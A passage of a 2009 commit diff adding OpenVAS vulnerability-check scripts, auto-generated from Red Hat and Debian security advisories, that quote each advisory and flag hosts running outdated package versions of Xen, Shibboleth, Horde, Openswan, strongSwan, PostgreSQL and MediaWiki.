+if(isrpmvuln(pkg:"elinks-debuginfo", rpm:"elinks-debuginfo~0.9.2~4.el4_8.1", rls:"RHENT_4")) { + vuln = 1; +} +if(isrpmvuln(pkg:"elinks", rpm:"elinks~0.11.1~6.el5_4.1", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"elinks-debuginfo", rpm:"elinks-debuginfo~0.11.1~6.el5_4.1", rls:"RHENT_5")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/RHSA_2009_1472.nasl =================================================================== --- trunk/openvas-plugins/scripts/RHSA_2009_1472.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/RHSA_2009_1472.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,122 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory RHSA-2009:1472 () +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64994); + script_cve_id("CVE-2009-3525"); + script_version ("$"); + script_name("RedHat Security Advisory RHSA-2009:1472"); + + desc = " +The remote host is missing updates announced in +advisory RHSA-2009:1472. + +Xen is an open source virtualization framework. Virtualization allows users +to run guest operating systems in virtual machines on top of a host +operating system. + +The pyGrub boot loader did not honor the password option in the grub.conf +file for para-virtualized guests. Users with access to a guest's console +could use this flaw to bypass intended access restrictions and boot the +guest with arbitrary kernel boot options, allowing them to get root +privileges in the guest's operating system. With this update, pyGrub +correctly honors the password option in grub.conf for para-virtualized +guests. 
(CVE-2009-3525) + +This update also fixes the following bugs: + +* rebooting para-virtualized guests sometimes caused those guests to crash +due to a race condition in the xend node control daemon. This update fixes +this race condition so that rebooting guests no longer potentially causes +them to crash and fail to reboot. (BZ#525141) + +* due to a race condition in the xend daemon, a guest could disappear from +the list of running guests following a reboot, even though the guest +rebooted successfully and was running. This update fixes this race +condition so that guests always reappear in the guest list following a +reboot. (BZ#525143) + +* attempting to use PCI pass-through to para-virtualized guests on certain +kernels failed with a Function not implemented error message. As a +result, users requiring PCI pass-through on para-virtualized guests were +not able to update the xen packages without also updating the kernel and +thus requiring a reboot. These updated packages enable PCI pass-through for +para-virtualized guests so that users do not need to upgrade the kernel in +order to take advantage of PCI pass-through functionality. (BZ#525149) + +All Xen users should upgrade to these updated packages, which contain +backported patches to correct these issues. After installing the updated +packages, the xend service must be restarted for this update to take +effect. + +Solution: +Please note that this update is available via +Red Hat Network. To use Red Hat Network, launch the Red +Hat Update Agent with the following command: up2date + +http://rhn.redhat.com/errata/RHSA-2009-1472.html +http://www.redhat.com/security/updates/classification/#moderate + +Risk factor : Medium"; + + script_description(desc); + + script_summary("Redhat Security Advisory RHSA-2009:1472"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com"); + script_family("Red Hat Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"xen-debuginfo", rpm:"xen-debuginfo~3.0.3~94.el5_4.1", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"xen-libs", rpm:"xen-libs~3.0.3~94.el5_4.1", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"xen", rpm:"xen~3.0.3~94.el5_4.1", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"xen-devel", rpm:"xen-devel~3.0.3~94.el5_4.1", rls:"RHENT_5")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/deb_1896_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/deb_1896_1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/deb_1896_1.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,136 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory DSA 1896-1 (opensaml, shibboleth-sp) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65003); + script_version ("$"); + script_name("Debian Security Advisory DSA 1896-1 (opensaml, shibboleth-sp)"); + + desc = " +The remote host is missing an update to opensaml, shibboleth-sp +announced via advisory DSA 1896-1. + +Several vulnerabilities have been discovered in the opensaml and +shibboleth-sp packages, as used by Shibboleth 1.x: + +Chris Ries discovered that decoding a crafted URL leads to a crash +(and potentially, arbitrary code execution). + +Ian Young discovered that embedded NUL characters in certificate names +were not correctly handled, exposing configurations using PKIX trust +validation to impersonation attacks. + +Incorrect processing of SAML metadata ignored key usage constraints. 
+ +For the old stable distribution (etch), these problems have been fixed +in version 1.3f.dfsg1-2+etch1 of the shibboleth-sp packages, and +version 1.1a-2+etch1 of the opensaml packages. + +For the stable distribution (lenny), these problems have been fixed in +version 1.3.1.dfsg1-3+lenny1 of the shibboleth-sp packages, and +version 1.1.1-2+lenny1 of the opensaml packages. + +The unstable distribution (sid) does not contain Shibboleth 1.x +packages. + +This update requires restarting the affected services (mainly Apache) +to become effective. + +We recommend that you upgrade your Shibboleth 1.x packages. + +Solution: +https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201896-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Debian Security Advisory DSA 1896-1 (opensaml, shibboleth-sp)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Debian Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"opensaml-schemas", ver:"1.1a-2+etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libapache2-mod-shib", ver:"1.3f.dfsg1-2+etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libshib6", ver:"1.3f.dfsg1-2+etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsaml-dev", ver:"1.1a-2+etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libshib-dev", ver:"1.3f.dfsg1-2+etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsaml5", ver:"1.1a-2+etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libshib-target5", ver:"1.3f.dfsg1-2+etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"opensaml-schemas", ver:"1.1.1-2+lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libshib-dev", 
ver:"1.3.1.dfsg1-3+lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsaml5", ver:"1.1.1-2+lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libapache2-mod-shib", ver:"1.3.1.dfsg1-3+lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libshib6", ver:"1.3.1.dfsg1-3+lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsaml-dev", ver:"1.1.1-2+lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libshib-target5", ver:"1.3.1.dfsg1-3+lenny1", rls:"DEB5.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/deb_1897_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/deb_1897_1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/deb_1897_1.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,98 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory DSA 1897-1 (horde3) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65002); + script_cve_id("CVE-2009-3236"); + script_version ("$"); + script_name("Debian Security Advisory DSA 1897-1 (horde3)"); + + desc = " +The remote host is missing an update to horde3 +announced via advisory DSA 1897-1. + +Stefan Esser discovered that Horde, a web application framework providing +classes for dealing with preferences, compression, browser detection, +connection tracking, MIME, and more, is insufficiently validating and +escaping user provided input. The Horde_Form_Type_image form element +allows to reuse a temporary filename on reuploads which are stored in a +hidden HTML field and then trusted without prior validation. An attacker +can use this to overwrite arbitrary files on the system or to upload PHP +code and thus execute arbitrary code with the rights of the webserver. 
+ + +For the oldstable distribution (etch), this problem has been fixed in +version 3.1.3-4etch6. + +For the stable distribution (lenny), this problem has been fixed in +version 3.2.2+debian0-2+lenny1. + +For the testing distribution (squeeze), this problem has been fixed in +version 3.3.5+debian0-1. + +For the unstable distribution (sid), this problem has been fixed in +version 3.3.5+debian0-1. + + +We recommend that you upgrade your horde3 packages. + +Solution: +https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201897-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Debian Security Advisory DSA 1897-1 (horde3)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Debian Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"horde3", ver:"3.1.3-4etch6", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"horde3", ver:"3.2.2+debian0-2+lenny1", rls:"DEB5.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/deb_1898_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/deb_1898_1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/deb_1898_1.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,100 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory DSA 1898-1 (openswan) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65004); + script_cve_id("CVE-2009-2185"); + script_version ("$"); + script_name("Debian Security Advisory DSA 1898-1 (openswan)"); + + desc = " +The remote host is missing an update to openswan +announced via advisory DSA 1898-1. + +It was discovered that the pluto daemon in the openswan, an +implementation of IPSEC and IKE, could crash when processing a crafted +X.509 certificate. + +For the old stable distribution (etch), this problem has been fixed in +version 2.4.6+dfsg.2-1.1+etch2. + +For the stable distribution (lenny), this problem has been fixed in +version 2.4.12+dfsg-1.3+lenny2. + +For the unstable distribution (sid), this problem has been fixed in +version 2.6.22+dfsg-1. + +We recommend that you upgrade your openswan package. 
+ +Solution: +https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201898-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Debian Security Advisory DSA 1898-1 (openswan)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Debian Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"openswan-modules-source", ver:"2.4.6+dfsg.2-1.1+etch2", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"linux-patch-openswan", ver:"2.4.6+dfsg.2-1.1+etch2", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"openswan", ver:"2.4.6+dfsg.2-1.1+etch2", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"linux-patch-openswan", ver:"2.4.12+dfsg-1.3+lenny2", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"openswan-modules-source", ver:"2.4.12+dfsg-1.3+lenny2", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"openswan", ver:"2.4.12+dfsg-1.3+lenny2", rls:"DEB5.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/deb_1899_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/deb_1899_1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/deb_1899_1.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,102 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory DSA 1899-1 (strongswan) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65006); + script_cve_id("CVE-2009-1957", "CVE-2009-1958", "CVE-2009-2185", "CVE-2009-2661"); + script_version ("$"); + script_name("Debian Security Advisory DSA 1899-1 (strongswan)"); + + desc = " +The remote host is missing an update to strongswan +announced via advisory DSA 1899-1. + +Several remote vulnerabilities have been discovered in strongswan, an +implementation of the IPSEC and IKE protocols. The Common +Vulnerabilities and Exposures project identifies the following +problems: + +CVE-2009-1957 +CVE-2009-1958 + +The charon daemon can crash when processing certain crafted IKEv2 +packets. (The old stable distribution (etch) was not affected by +these two problems because it lacks IKEv2 support.) + +CVE-2009-2185 +CVE-2009-2661 + +The pluto daemon could crash when processing a crafted X.509 +certificate. 
+ +For the old stable distribution (etch), these problems have been fixed +in version 2.8.0+dfsg-1+etch2. + +For the stable distribution (lenny), these problems have been fixed in +version 4.2.4-5+lenny3. + +For the unstable distribution (sid), these problems have been fixed in +version 4.3.2-1.1. + +We recommend that you upgrade your strongswan packages. + +Solution: +https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201899-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Debian Security Advisory DSA 1899-1 (strongswan)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Debian Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"strongswan", ver:"2.8.0+dfsg-1+etch2", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"strongswan", ver:"4.2.4-5+lenny3", rls:"DEB5.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/deb_1900_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/deb_1900_1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/deb_1900_1.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,226 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory DSA 1900-1 (postgresql-7.4, postgresql-8.1, postgresql-8.3, postgresql-8.4) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65005); + script_cve_id("CVE-2009-3229", "CVE-2009-3230", "CVE-2009-3231"); + script_version ("$"); + script_name("Debian Security Advisory DSA 1900-1 (postgresql-7.4, postgresql-8.1, postgresql-8.3, postgresql-8.4)"); + + desc = " +The remote host is missing an update to postgresql-7.4, postgresql-8.1, postgresql-8.3, postgresql-8.4 +announced via advisory DSA 1900-1. + +Several vulnerabilities have been discovered in PostgreSQL, an SQL +database system. The Common Vulnerabilities and Exposures project +identifies the following problems: + +CVE-2009-3229 + +Authenticated users can shut down the backend server by re-LOAD-ing +libraries in $libdir/plugins, if any libraries are present there. +(The old stable distribution (etch) is not affected by this issue.) 
+ +CVE-2009-3230 + +Authenticated non-superusers can gain database superuser privileges if +they can create functions and tables due to incorrect execution of +functions in functional indexes. + +CVE-2009-3231 + +If PostgreSQL is configured with LDAP authentication, and the LDAP +configuration allows anonymous binds, it is possible for a user to +authenticate themselves with an empty password. (The old stable +distribution (etch) is not affected by this issue.) + +In addition, this update contains reliability improvements which do +not target security issues. + +For the old stable distribution (etch), these problems have been fixed +in version 7.4.26-0etch1 of the postgresql-7.4 source package, and +version 8.1.18-0etch1 of the postgresql-8.1 source package. + +For the stable distribution (lenny), these problems have been fixed in +version 8.3.8-0lenny1 of the postgresql-8.3 source package. + +For the unstable distribution (sid), these problems have been fixed in +version 8.3.8-1 of the postgresql-8.3 source package, and version +8.4.1-1 of the postgresql-8.4 source package. + +We recommend that you upgrade your PostgreSQL packages. + +Solution: +https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201900-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Debian Security Advisory DSA 1900-1 (postgresql-7.4, postgresql-8.1, postgresql-8.3, postgresql-8.4)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com"); + script_family("Debian Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"postgresql-server-dev-7.4", ver:"7.4.26-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-doc-8.1", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-doc-7.4", ver:"7.4.26-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-contrib-7.4", ver:"7.4.26-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-plperl-7.4", ver:"7.4.26-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpq4", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-8.1", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpq-dev", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-plpython-8.1", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libecpg5", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libecpg-compat2", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-plperl-8.1", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-contrib-8.1", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libecpg-dev", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-plpython-7.4", ver:"7.4.26-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpgtypes2", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-pltcl-7.4", ver:"7.4.26-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-server-dev-8.1", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} 
+if(isdpkgvuln(pkg:"postgresql-client-7.4", ver:"7.4.26-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-7.4", ver:"7.4.26-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-pltcl-8.1", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-client-8.1", ver:"8.1.18-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-doc-8.3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-contrib", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-client", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-doc", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-pltcl-8.3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpq-dev", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-contrib-8.3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libecpg-compat3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpq5", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libpgtypes3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libecpg6", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-client-8.3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-server-dev-8.3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-plperl-8.3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libecpg-dev", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-plpython-8.3", ver:"8.3.8-0lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-8.3", ver:"8.3.8-0lenny1", 
rls:"DEB5.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/deb_1901_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/deb_1901_1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/deb_1901_1.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,115 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory DSA 1901-1 (mediawiki1.7) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65007); + script_cve_id("CVE-2008-5249", "CVE-2008-5250", "CVE-2008-5252", "CVE-2009-0737"); + script_version ("$"); + script_name("Debian Security Advisory DSA 1901-1 (mediawiki1.7)"); + + desc = " +The remote host is missing an update to mediawiki1.7 +announced via advisory DSA 1901-1. + + +Several vulnerabilities have been discovered in mediawiki1.7, a website engine +for collaborative work. The Common Vulnerabilities and Exposures project +identifies the following problems: + +CVE-2008-5249 + +David Remahl discovered that mediawiki1.7 is prone to a cross-site scripting attack. + +CVE-2008-5250 + +David Remahl discovered that mediawiki1.7, when Internet Explorer is used and +uploads are enabled, or an SVG scripting browser is used and SVG uploads are +enabled, allows remote authenticated users to inject arbitrary web script or +HTML by editing a wiki page. 
+ +CVE-2008-5252 + +David Remahl discovered that mediawiki1.7 is prone to a cross-site request +forgery vulnerability in the Special:Import feature. + +CVE-2009-0737 + +It was discovered that mediawiki1.7 is prone to a cross-site scripting attack in +the web-based installer. + + +For the oldstable distribution (etch), these problems have been fixed in version +1.7.1-9etch1 for mediawiki1.7, and mediawiki is not affected (it is a +metapackage for mediawiki1.7). + +The stable (lenny) distribution does not include mediawiki1.7, and these +problems have been fixed in version 1:1.12.0-2lenny3 for mediawiki which was +already included in the lenny release. + +The unstable (sid) and testing (squeeze) distributions do not +include mediawiki1.7, and these problems have been fixed in version 1:1.14.0-1 +for mediawiki. + + +We recommend that you upgrade your mediawiki1.7 packages. + +Solution: +https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201901-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Debian Security Advisory DSA 1901-1 (mediawiki1.7)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. 
